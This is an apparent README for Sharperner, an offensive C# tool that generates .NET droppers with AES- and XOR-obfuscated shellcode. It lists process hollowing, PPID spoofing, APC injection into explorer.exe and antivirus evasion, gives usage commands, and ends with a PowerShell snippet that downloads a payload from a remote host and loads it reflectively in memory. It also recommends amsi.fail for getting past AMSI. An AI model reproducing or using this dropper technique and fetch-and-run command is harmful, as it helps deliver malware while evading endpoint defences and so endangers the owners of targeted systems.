Sharperner: generate .NET dropper with AES and XOR obfuscated shellcode
Sharperner
Sharperner is a tool written in CSharp that generates a .NET dropper with AES and XOR obfuscated shellcode. A generated executable can possibly bypass signature check but I can’t be sure it can bypass heuristic scanning.
Features
PE binary
- Process Hollowing
- PPID Spoofing
- Random generated AES key and iv
- Final Shellcode, Key, and IV are translated to morse code 🙂
.NET binary
- AES + XOR encrypted shellcode
- APC Process Injection (explorer.exe)
- Random function names
- Random generated AES key and iv
- Final Shellcode, Key, and IV are translated to morse code 🙂
Use
/file B64,hex,raw shellcode
/type cs,cpp
/out Output file Location (Optional)Example:
Sharperner.exe /file:file.txt /type:cpp
Sharperner.exe /file:file.txt /out:payload.exe
Suggestion
To avoid touching the disk, Generated .NET executable can be loaded reflectively with powershell. AMSI is the enemy now, amsi.fail ftw!
$data = (New-Object System.Net.WebClient).DownloadData(‘http://10.10.10.10/payload.exe’)
$assem = [System.Reflection.Assembly]::Load($data)
[TotallyNotMal.Program]::Main()
